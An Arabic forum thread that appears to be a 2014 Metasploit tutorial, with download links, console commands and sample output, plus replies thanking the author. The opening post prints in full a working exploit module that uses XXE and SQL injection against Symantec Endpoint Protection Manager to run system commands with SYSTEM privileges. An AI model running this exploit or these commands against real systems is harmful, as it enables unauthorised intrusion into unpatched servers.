1. أهلا وسهلاً بكم في :: IQ-TeaM FORUM :: .
    إذا كانت هذه الزيارة الأولى أو لديك الرغبة بالانضمام لأعضاء شبكة عراق تيم فيجب الاطلاع على خصوصية الشبكه فربما بقائك زائر افضل لك من الانضمام بحيث أن قوانين شبكة عراق تيم لا تتناسب مع اهتماماتك .
    • للأطلاع على الخصوصية وسياسة الاستخدام - التفاصيل
    • بعد الاطلاع على سياسة الموقع وقوانين شبكة عراق تيم يمكنك التسجيل معنا - تسجيل عضو جديد
    إستبعاد الملاحظة
الكاتب : or0 | المشاهدات : 1,801 | الردود : 7
حالة الموضوع:
مغلق
  1. or0 V • I • P

    الأنتساب:
    ‏22 فبراير 2014
    المشاركات:
    392
    الإعجابات المتلقاة:
    14
    نقاط الجائزة:
    50
    نظام التشغيل:
    Linux
    اللغة البرمجية:
    Perl
    Facebook:
    IQ_tema











    السلام عليكم ورحمه الله وبركاته ...​


    1- تحميل الميتا سبوليت للويندوز واللينكس .
    2- دروس في الميتا سبلويت .
    3- كتابين لـ تعليم Metasploit .


    اولا : تحميل الميتا سبلويت للويندوز واللينكس :

    قبل ان نبدأ الدروس , عليك ان تمتلك الميتا سبلويت للتعويد على كتابة الاوامر والادوات داخل الميتا سبلويت , فقبل كل شيء قم بتحميل اخر اصدار للميتا سبلويت 4.8.2 :

    1- لنظام الويندوز :
    من الرابط : http://downloads.metasploit.com/data/releases/archive/metasploit-4.8.2-windows-installer.exe

    2-لنظام اللينكس :
    http://downloads.metasploit.com/data/releases/archive/metasploit-4.8.2-linux-installer.run

    3- لنظام اللينكس 64 بت :
    http://downloads.metasploit.com/data/releases/archive/metasploit-4.8.2-linux-x64-installer.run

    ويمكنك الدخول على الرابط التالي للتأكد من وجود اصدار جديد , علما ان هذا الاصدار اخر مرة تحقق منه في تاريخ 2014-2-20 :
    رابط : https://github.com/rapid7/metasploit-framework/wiki/Downloads-by-Version



    ثانيا : دروس تعليمية للميتا سبلويت :

    مقدمة ومفاهيم عن الميتا سبلويت :

    الـ ميتا سبوليت Metasploit Framework :

    الميتا سبلويت هي Framework مشروع بدأ في سنة 2003 , وقد شهد تطورات تدريجية من ذلك الوقت لحد الان , وتحتوي الميتا سبلويت على العديد من ثغرات لفحص الانظمة والشبكات العديدة والانواع الاخرى من الثغرات .
    والميتا سبلويت هو مشروع قوي جدا , ومساعد القراصنة على فحص الانظمة والشبكات واكتشاف الثغرات .
    وقد جعل الكثير من القراصنة استغلاله في اختراق الاجهزة والسيرفرات من خلال استغلال ثغرات الانظمة والثغرات الاخرى المكتشفة في الميتا سبوليت .
    وايضا الميتا سبلوت تمكن المستخدمين من اضافة ثغرات جديدة للمشروع لأطلاقها في اصدارات جديدة للمشروع .
    والميتا سبلويت بأختصار " اختبار الاختراق للاجهزة والشبكات والانظمة والخوادم و الفحوصات العامة في الويب وعالم الثغرات والاختراق ..."

    وتستخدم الميتا سبلويت لغة البيرل والبايثون وغيرها من اللغات لصنع الثغرات واستغلالها , ويوجد الكثير من ثغرات الميتا سبلويت الموجودة في موقع exploit-db , مثال لثغرة موجودة في الميتا سبلويت :
    اسم الثغرة : Symantec Endpoint Protection Manager - Remote Command Execution

    كود الثغرة :
    كود:
    require 'msf/core'
    require 'msf/core/exploit/powershell'
     
    class Metasploit3 < Msf::Exploit::Remote
      Rank = ExcellentRanking
     
      include REXML
      include Msf::Exploit::CmdStagerVBS
      include Msf::Exploit::Remote::HttpClient
     
      def initialize(info = {})
        super(update_info(info,
          'Name'           => 'Symantec Endpoint Protection Manager Remote Command Execution',
          'Description'    => %q{
            This module exploits XXE and SQL injection flaws in Symantec Endpoint Protection Manager
            versions 11.0, 12.0 and 12.1. When supplying a specially crafted XXE request an attacker
            can reach SQL injection affected components. As xp_cmdshell is enabled in the included
            database instance, it's possible to execute arbitrary system commands on the remote system
            with SYSTEM privileges.
          },
          'Author'         =>
            [
              'Stefan Viehbock', # Discovery
              'Chris Graham', # PoC exploit
              'xistence <xistence[at]0x90.nl>' # Metasploit module
            ],
          'License'        => MSF_LICENSE,
          'References'     =>
            [
              [ 'CVE', '2013-5014' ],
              [ 'CVE', '2013-5015' ],
              [ 'EDB', '31853'],
              [ 'URL', 'https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20140218-0_Symantec_Endpoint_Protection_Multiple_critical_vulnerabilities_wo_poc_v10.txt' ]
            ],
          'Arch'           => ARCH_X86,
          'Platform'       => 'win',
          'Targets'        =>
            [
              ['Windows VBS Stager', {}]
            ],
          'Privileged'     => true,
          'DisclosureDate' => 'Feb 24 2014',
          'DefaultTarget'  => 0))
     
        register_options(
          [
            Opt::RPORT(9090),
            OptString.new('TARGETURI', [true, 'The base path', '/'])
          ], self.class)
      end
     
      def check
        res = send_request_cgi(
          {
            'uri'   =>  normalize_uri(target_uri.path),
            'method' => 'GET',
          })
     
        if res && res.code == 200 && res.body =~ /Symantec Endpoint Protection Manager/ && res.body =~ /1995 - 2013 Symantec Corporation/
          return Exploit::CheckCode::Appears
        end
     
        Exploit::CheckCode::Safe
      end
     
      def exploit
        print_status("#{peer} - Sending payload")
        # Execute the cmdstager, max length of the commands is ~3950
        execute_cmdstager({:linemax => 3950})
      end
     
      def execute_command(cmd, opts = {})
        # Convert the command data to hex, so we can use that in the xp_cmdshell. Else characters like '>' will be harder to bypass in the XML.
        command = "0x#{Rex::Text.to_hex("cmd /c #{cmd}", '')}"
     
        # Generate random 'xx032xxxx' sequence number.
        seqnum = "#{rand_text_numeric(2)}032#{rand_text_numeric(4)}"
     
        soap = soap_request(seqnum, command)
     
        post_data = Rex::MIME::Message.new
        post_data.add_part(soap, "text/xml", nil, "form-data; name=\"Content\"")
        xxe = post_data.to_s
     
        res = send_request_cgi(
          {
            'uri' => normalize_uri(target_uri.path, 'servlet', 'ConsoleServlet'),
            'method' => 'POST',
            'vars_get' => { 'ActionType' => 'ConsoleLog' },
            'ctype'  => "multipart/form-data; boundary=#{post_data.bound}",
            'data' => xxe,
          })
     
        if res and res.body !~ /ResponseCode/
          fail_with(Failure::Unknown, "#{peer} - Something went wrong.")
        end
      end
     
      def soap_request(seqnum, command)
        randpayload = rand_text_alpha(8+rand(8))
        randxxe = rand_text_alpha(8+rand(8))
        entity = "<!ENTITY #{randpayload} SYSTEM \"http://127.0.0.1:9090/servlet/ConsoleServlet?"
        entity << "ActionType=ConfigServer&action=test_av&SequenceNum=#{seqnum}&Parameter=';call xp_cmdshell(#{command});--\" >"
     
        xml = Document.new
        xml.add(DocType.new('sepm', "[ METASPLOIT ]"))
        xml.add_element("Request")
        xxe = xml.root.add_element(randxxe)
        xxe.text = "PAYLOAD"
     
        xml_s = xml.to_s
        xml_s.gsub!(/METASPLOIT/, entity) # To avoid html encoding
        xml_s.gsub!(/PAYLOAD/, "&#{randpayload};") # To avoid html encoding
     
        xml_s
      end
     
    end
    *=== تحديد كود ===*
    هذا الكود عبارة عن تعليمات برمجية مكتوبة بأحد لغات البرمجة , وتستخدم في الميتا سبلويت لآستغلال السيرفرات المصابة بهذه الثغرة .

    ويمكنك انت بنفسك صنع وكتابة ثغرات ونشرها في مشروع الميتا سبلوت .



    الاكواد والاوامر الاساسية في الميتا سبلوت :

    0- كود اظهار التفاصيل في الميتا سبلويت :
    كود:
    Msfconsole
    *=== تحديد كود ===*
    1- كود اظهار جميع الثغرات الموجودة في الميتا سبلويت :
    كود:
    show exploits
    *=== تحديد كود ===*
    2- كود اظهار البايلود في الميتا سبلويت :
    كود:
    show payloads
    *=== تحديد كود ===*
    * البايلود هو اظهار صلاحيات الثغرة .

    3- كود اظهار ثغرات الفحص :
    كود:
    show auxiliary 
    *=== تحديد كود ===*
    *ثغرات الفحص المقصود بها هي اظهار ثغرات الي تفحص البورتات والمنافذ للاجهزة والسيرفرات وثغرات الفحص الاخرى .

    4- كود استخدام ثغرة او بايلود :
    كود:
    use
    *=== تحديد كود ===*
    *يستخدم هذا الكود لأستخدام ثغرة مثلا :
    كود:
    use aplof\temp\exploit\tag
    *=== تحديد كود ===*
    ومعناها استخدم هذه الثغرة : aplof\temp\exploit\tag

    5- كود ضبط الاوامر والتعديل على خيارات الثغرة :
    كود:
    set
    *=== تحديد كود ===*
    مثال :
    كود:
    set LHOST 129.168.1.100
    *=== تحديد كود ===*
    ومعناه ضبط الـ Local Host الخاص بالـ يبي الجهاز , وممكن ضبط البورت ايضا وهناك اعدادات للضبط , وجميع الاعدادات بسيطة .
    6- كود اظهار الخيارات :
    كود:
    show options 
    *=== تحديد كود ===*
    * اظهار خيارات الثغرة , او خيارات الاعدادات او ... .

    7- كود اظهار ثغرات التشفير :
    كود:
    show encoders
    *=== تحديد كود ===*
    8- كود اظهار ألـنوبس :
    كود:
    show nops 
    *=== تحديد كود ===*
    * يستخدم لغرض عرض مكونات او مولدات الـnops .

    9- اكواد اخرى سريعة لا داعي لشرحها فقط معرفة بالانجليزية للكلمات , ومنقولة من كتاب صانعي مشروع الميتا سبلويت :
    كود:
       Command               Description                                         
       -------               -----------                                         
       db_add_host           Add one or more hosts to the database               
       db_add_note           Add a note to host                                  
       db_add_port           Add a port to host                                  
       db_autopwn            Automatically exploit everything                    
       db_hosts              List all hosts in the database                      
       db_import_nessus_nbe  Import a Nessus scan result file (NBE)              
       db_import_nmap_xml    Import a Nmap scan results file (-oX)               
       db_nmap               Executes nmap and records the output automatically  
       db_notes              List all notes in the database                      
       db_services           List all services in the database                   
       db_vulns              List all vulnerabilities in the database
    *=== تحديد كود ===*
    10- كود الرجوع :
    كود:
    back
    *=== تحديد كود ===*
    11- كود العرض والمشاهدة في الرئيسية :
    كود:
    banner
    *=== تحديد كود ===*
    مثال :
    كود:
    msf > banner
    
    Frustrated with proxy pivoting? Upgrade to layer-2 VPN pivoting with
    Metasploit Pro -- type 'go_pro' to launch it now.
    
           =[ metasploit v4.8.2-2014021901 [core:4.8 api:1.0] ]
    + -- --=[ 1265 exploits - 695 auxiliary - 202 post ]
    + -- --=[ 330 payloads - 32 encoders - 8 nops      ]
    *=== تحديد كود ===*
    12- كود التحقق :
    كود:
    check
    *=== تحديد كود ===*
    مثأل :
    كود:
    msf exploit(ms08_067_netapi) > show options
    
    Module options (exploit/windows/smb/ms08_067_netapi):
    
       Name     Current Setting  Required  Description
       ----     ---------------  --------  -----------
       RHOST    172.16.194.134   yes       The target address
       RPORT    445              yes       Set the SMB service port
       SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)
    
    
    Exploit target:
    
       Id  Name
       --  ----
       0   Automatic Targeting
    
    
    msf exploit(ms08_067_netapi) > check
    
    [*] Verifying vulnerable status... (path: 0x0000005a)
    [*] System is not vulnerable (status: 0x00000000)
    [*] The target is not exploitable.
    msf  exploit(ms08_067_netapi) >
    
    *=== تحديد كود ===*
    13- كود ضبط اللون :
    كود:
    color
    *=== تحديد كود ===*
    مثال :
    كود:
    msf > banner
    Usage: color <'true'|'false'|'auto'>
    
    Enable or disable color output.
    *=== تحديد كود ===*
    14- كود الاتصال :
    كود:
    connect
    *=== تحديد كود ===*
    * يتم عبر الايبي والبورت , مثال :
    كود:
    msf > connect 192.168.1.1 23
    [*] Connected to 192.168.1.1:23
    DD-WRT v24 std (c) 2008 NewMedia-NET GmbH
    Release: 07/27/08 (SVN revision: 10011)
    DD-WRT login:
    *=== تحديد كود ===*
    15- كود اظهار المعلومات :
    كود:
    info
    *=== تحديد كود ===*
    * يستخدم لآظهار المعلومات او معلومات الثغرة , مثال :
    كود:
    msf  exploit(ms09_050_smb2_negotiate_func_index) > info exploit/windows/smb/ms09_050_smb2_negotiate_func_index 
    
           Name: Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference
         Module: exploit/windows/smb/ms09_050_smb2_negotiate_func_index
        Version: 14774
       Platform: Windows
     Privileged: Yes
        License: Metasploit Framework License (BSD)
           Rank: Good
    
    Provided by:
      Laurent Gaffie 
      hdm 
      sf 
    
    Available targets:
      Id  Name
      --  ----
      0   Windows Vista SP1/SP2 and Server 2008 (x86)
    
    Basic options:
      Name   Current Setting  Required  Description
      ----   ---------------  --------  -----------
      RHOST                   yes       The target address
      RPORT  445              yes       The target port
      WAIT   180              yes       The number of seconds to wait for the attack to complete.
    
    Payload information:
      Space: 1024
    
    Description:
      This module exploits an out of bounds function table dereference in 
      the SMB request validation code of the SRV2.SYS driver included with 
      Windows Vista, Windows 7 release candidates (not RTM), and Windows 
      2008 Server prior to R2. Windows Vista without SP1 does not seem 
      affected by this flaw.
    
    References:
      http://www.microsoft.com/technet/security/bulletin/MS09-050.mspx
      http://cve.mitre.org/cgi-bin/cvename.cgi?name=2009-3103
      http://www.securityfocus.com/bid/36299
      http://www.osvdb.org/57799
      http://seclists.org/fulldisclosure/2009/Sep/0039.html
      http://www.microsoft.com/technet/security/Bulletin/MS09-050.mspx
    
    msf  exploit(ms09_050_smb2_negotiate_func_index) >
    *=== تحديد كود ===*
    16 - كود استيراد الاضافات :
    كود:
    load
    *=== تحديد كود ===*
    مثال :
    كود:
    msf > load
    Usage: load <path> [var=val var=val ...]
    
    Loads a plugin from the supplied path.  If path is not absolute, first looks
    in the user's plugin directory (/root/.msf4/plugins) then
    in the framework root plugin directory (/usr/share/metasploit-framework/plugins).
    The optional var=val options are custom parameters that can be passed to plugins.
    
    msf > load pcap_log
    [*] PcapLog plugin loaded.
    [*] Successfully loaded plugin: pcap_log
    
    *=== تحديد كود ===*
    17- كود استيراد اضافات في المسارات :
    كود:
    loadpath
    *=== تحديد كود ===*
    مثال :
    كود:
    msf > loadpath /home/secret/modules
    
    Loaded 0 modules.
    *=== تحديد كود ===*
    18- كود عدم الاستيراد :
    كود:
    unload
    *=== تحديد كود ===*
    مثال :
    كود:
    msf > unload pcap_log
    Unloading plugin pcap_log...unloaded.
    *=== تحديد كود ===*
    19- كود التعديل والسماح والضبط في الـ Socks والـ Session :
    كود:
    route
    *=== تحديد كود ===*
    مثال :
    كود:
    meterpreter > route -h
    Usage: route [-h] command [args]
    
    Display or modify the routing table on the remote machine.
    
    Supported commands:
    
       add    [subnet] [netmask] [gateway]
       delete [subnet] [netmask] [gateway]
       list
    
    meterpreter >
    meterpreter > route
    
    Network routes
    ==============
    
        Subnet           Netmask          Gateway
        ------           -------          -------
        0.0.0.0          0.0.0.0          172.16.1.254
        127.0.0.0        255.0.0.0        127.0.0.1
        172.16.1.0       255.255.255.0    172.16.1.100
        172.16.1.100     255.255.255.255  127.0.0.1
        172.16.255.255   255.255.255.255  172.16.1.100
        224.0.0.0        240.0.0.0        172.16.1.100
        255.255.255.255  255.255.255.255  172.16.1.100
    
    *=== تحديد كود ===*
    20- كود البحث :
    كود:
    Search
    *=== تحديد كود ===*
    مثال :
    كود:
    msf > search usermap_script
    
    Matching Modules
    ================
    
       Name                                Disclosure Date  Rank       Description
       ----                                ---------------  ----       -----------
       exploit/multi/samba/usermap_script  2007-05-14       excellent  Samba "username map script" Command Execution
    
    
    msf >
    *=== تحديد كود ===*
    21- كود المساعدة :
    كود:
    Help
    *=== تحديد كود ===*
    مثال :
    كود:
    msf > help search
    Usage: search [keywords]
    
    Keywords:
      name      :  Modules with a matching descriptive name
      path      :  Modules with a matching path or reference name
      platform  :  Modules affecting this platform
      type      :  Modules of a specific type (exploit, auxiliary, or post)
      app       :  Modules that are client or server attacks
      author    :  Modules written by this author
      cve       :  Modules with a matching CVE ID
      bid       :  Modules with a matching Bugtraq ID
      osvdb     :  Modules with a matching OSVDB ID
    
    Examples:
      search cve:2009 type:exploit app:client
    
    msf >
    *=== تحديد كود ===*
    22- كود البحث بواسطة الاسم :
    كود:
    Name
    *=== تحديد كود ===*
    مثال :
    كود:
    msf > search name:mysql
    
    Matching Modules
    ================
    
       Name                                               Disclosure Date  Rank       Description
       ----                                               ---------------  ----       -----------
       auxiliary/admin/mysql/mysql_enum                                    normal     MySQL Enumeration Module
       auxiliary/admin/mysql/mysql_sql                                     normal     MySQL SQL Generic Query
       auxiliary/analyze/jtr_mysql_fast                                    normal     John the Ripper MySQL Password Cracker (Fast Mode)
       auxiliary/scanner/mysql/mysql_authbypass_hashdump  2012-06-09       normal     MySQL Authentication Bypass Password Dump
       auxiliary/scanner/mysql/mysql_hashdump                              normal     MYSQL Password Hashdump
       auxiliary/scanner/mysql/mysql_login                                 normal     MySQL Login Utility
       auxiliary/scanner/mysql/mysql_schemadump                            normal     MYSQL Schema Dump
       auxiliary/scanner/mysql/mysql_version                               normal     MySQL Server Version Enumeration
       exploit/linux/mysql/mysql_yassl_getname            2010-01-25       good       MySQL yaSSL CertDecoder::GetName Buffer Overflow
       exploit/linux/mysql/mysql_yassl_hello              2008-01-04       good       MySQL yaSSL SSL Hello Message Buffer Overflow
       exploit/windows/mysql/mysql_payload                2009-01-16       excellent  Oracle MySQL for Microsoft Windows Payload Execution
       exploit/windows/mysql/mysql_yassl_hello            2008-01-04       average    MySQL yaSSL SSL Hello Message Buffer Overflow
    msf > 
    *=== تحديد كود ===*
    23- كود البحث بواسطة المسار :
    كود:
    Path
    *=== تحديد كود ===*
    مثال :
    كود:
    msf > search path:scada
    
    Matching Modules
    ================
    
       Name                                                 Disclosure Date  Rank     Description
       ----                                                 ---------------  ----     -----------
       auxiliary/admin/scada/igss_exec_17                   2011-03-21       normal   Interactive Graphical SCADA System Remote Command Injection
       exploit/windows/scada/citect_scada_odbc              2008-06-11       normal   CitectSCADA/CitectFacilities ODBC Buffer Overflow
    ...snip...
    *=== تحديد كود ===*
    24- كود فلترة نوع البحث حسب النوع :
    كود:
    type
    *=== تحديد كود ===*
    مثال :
    كود:
    msf > search type:post
    
    Matching Modules
    ================
    
       Name                                                Disclosure Date  Rank    Description
       ----                                                ---------------  ----    -----------
       post/linux/gather/checkvm                                            normal  Linux Gather Virtual Environment Detection
       post/linux/gather/enum_cron                                          normal  Linux Cron Job Enumeration
       post/linux/gather/enum_linux                                         normal  Linux Gather System Information
    ...snip...
    *=== تحديد كود ===*
    25- كود البحث بواسطة الصانع للثغرة :
    كود:
    author
    *=== تحديد كود ===*
    مثال :
    كود:
    msf > search author:dookie
    
    Matching Modules
    ================
    
       Name                                                       Disclosure Date  Rank     Description
       ----                                                       ---------------  ----     -----------
       exploit/osx/http/evocam_webserver                          2010-06-01       average  MacOS X EvoCam HTTP GET Buffer Overflow
       exploit/osx/misc/ufo_ai                                    2009-10-28       average  UFO: Alien Invasion IRC Client Buffer Overflow Exploit
       exploit/windows/browser/amaya_bdo                          2009-01-28       normal   Amaya Browser v11.0 bdo tag overflow
    ...snip...
    *=== تحديد كود ===*

    شرح اداة Nmap :
    اداة Nmap هي اداة لعمل فحص كامل للموقع المستهدف او السيرفر او الجهاز .

    وأهم المهمات التي تستعمل في هذه الاداة هي :
    1- معرفة البورتات المفتوحة .
    2- معرفة معلومات النظام .
    3- معرفة البرامج الموجودة على السيرفر والبورت الذي يعمل عليه .
    4- وعمل فحص كامل لباقي المعلومات .

    ولمعرفة طريقة استعمال هذه الاداة اكتب في موجه الاوامر للميتا سبلويت الأمر التالي :
    كود:
    Info nmap
    *=== تحديد كود ===*

    كتابين pdf لـ Metasploit :



    1- كتاب Metasploit User Guide 3.2 :
    الاصدار : 3.2
    الصيغة :pdf
    الكتاب مهم ومفيد وهو الكتاب الرسمي من صانعي الميتا سبلويت .
    التحميل : http://dev.metasploit.com/documents/users_guide.pdf




    2- كتاب Metasploit Guide :
    هو كتاب يشرح استخدام الاوامر والثغرات مع تطبيقات على ثغرات في الميتا سبلويت , هو كتاب مفيد لزيادة التعليم في الميتا سبلويت :
    الكتاب بصيغة pdf
    تحميله من الرابط التالي : http://dl.packetstormsecurity.net/papers/general/MetasploitGuide.pdf



    كنت ارغب في زيادة الدروس , واعتذر لقلتها , وشكرا للمتابعة وحظ موفق في تعليم الميتا سبلويت .

    سلام .​
     
    1 person likes this.
  2. NETJOURNAL مشرف

    الأنتساب:
    ‏18 مايو 2006
    المشاركات:
    676
    الإعجابات المتلقاة:
    1,544
    نقاط الجائزة:
    215
    الجنس:
    ذكر
    الوظيفة:
    ExploitCoding - ShellCoding - Defacer
    الإقامة:
    etc/shadow/~root
    نظام التشغيل:
    windows 7
    اللغة البرمجية:
    PHP
    رد: دروس تعليم الميتا سبلويت و تحميل Metasploit Framework للويندوز واللينكس و كتابين لـتعليم Meatsploit

    وعليكم ألسلام و رحمة الله و بركلتة .
    شرح ممتاز. عزيزي . بارك الله فيك .
    بس ينقل الى القسم الصحيح . ( اختبار الاختراق ).
     
  3. or0 V • I • P

    الأنتساب:
    ‏22 فبراير 2014
    المشاركات:
    392
    الإعجابات المتلقاة:
    14
    نقاط الجائزة:
    50
    نظام التشغيل:
    Linux
    اللغة البرمجية:
    Perl
    Facebook:
    رد: دروس تعليم الميتا سبلويت و تحميل Metasploit Framework للويندوز واللينكس و كتابين لـتعليم Meatsploit


    شكرا للنقل .. كنت ابحث عن قسم اختبار الاختراق لكن لا اعرف لم الاحظه .

    على اي حال شكرا وبارك الله فيك ...
     
  4. CoMmAnDo AlMaSaBi DeveloPer Plus

    الأنتساب:
    ‏13 مايو 2013
    المشاركات:
    143
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    50
    رد: دروس تعليم الميتا سبلويت و تحميل Metasploit Framework للويندوز واللينكس و كتابين لـتعليم Meatsploit

    وعليكم السلام
    بارك الله فيك اخي
    )5:")5:"
     
  5. خأإآلد DeveloPer Plus

    الأنتساب:
    ‏18 ديسمبر 2011
    المشاركات:
    108
    الإعجابات المتلقاة:
    2
    نقاط الجائزة:
    50
    الإقامة:
    K.s.A
    نظام التشغيل:
    Linux
    رد: دروس تعليم الميتا سبلويت و تحميل Metasploit Framework للويندوز واللينكس و كتابين لـتعليم Meatsploit

    تِسلَـمْ أخِي
    بَاركـَ الله فِيكَ
     
  6. ρяoғеѕoя Developer

    الأنتساب:
    ‏2 ابريل 2012
    المشاركات:
    61
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    20
    الإقامة:
    IQ-TEAM
    نظام التشغيل:
    Linux
    رد: دروس تعليم الميتا سبلويت و تحميل Metasploit Framework للويندوز واللينكس و كتابين لـتعليم Meatsploit

    موضوع في قمة الخيااال
    طرحت فابدعت
    دمت ودام عطائك
    ودائما بأنتظار جديدك الشيق :{1}:
     
  7. or0 V • I • P

    الأنتساب:
    ‏22 فبراير 2014
    المشاركات:
    392
    الإعجابات المتلقاة:
    14
    نقاط الجائزة:
    50
    نظام التشغيل:
    Linux
    اللغة البرمجية:
    Perl
    Facebook:
    رد: دروس تعليم الميتا سبلويت و تحميل Metasploit Framework للويندوز واللينكس و كتابين لـتعليم Meatsploit



    شكرا ليكم ع المرور ....
    تحياتي .. !
     
  8. Murtadha Albejawe Developer

    الأنتساب:
    ‏28 يوليو 2012
    المشاركات:
    78
    الإعجابات المتلقاة:
    3
    نقاط الجائزة:
    30
    الإقامة:
    $$$
    رد: دروس تعليم الميتا سبلويت و تحميل Metasploit Framework للويندوز واللينكس و كتابين لـتعليم Meatsploit

    تسلم على الشرح الرائع
    بارك الله فيك اخي !:"​
     
حالة الموضوع:
مغلق

مشاركة هذه الصفحة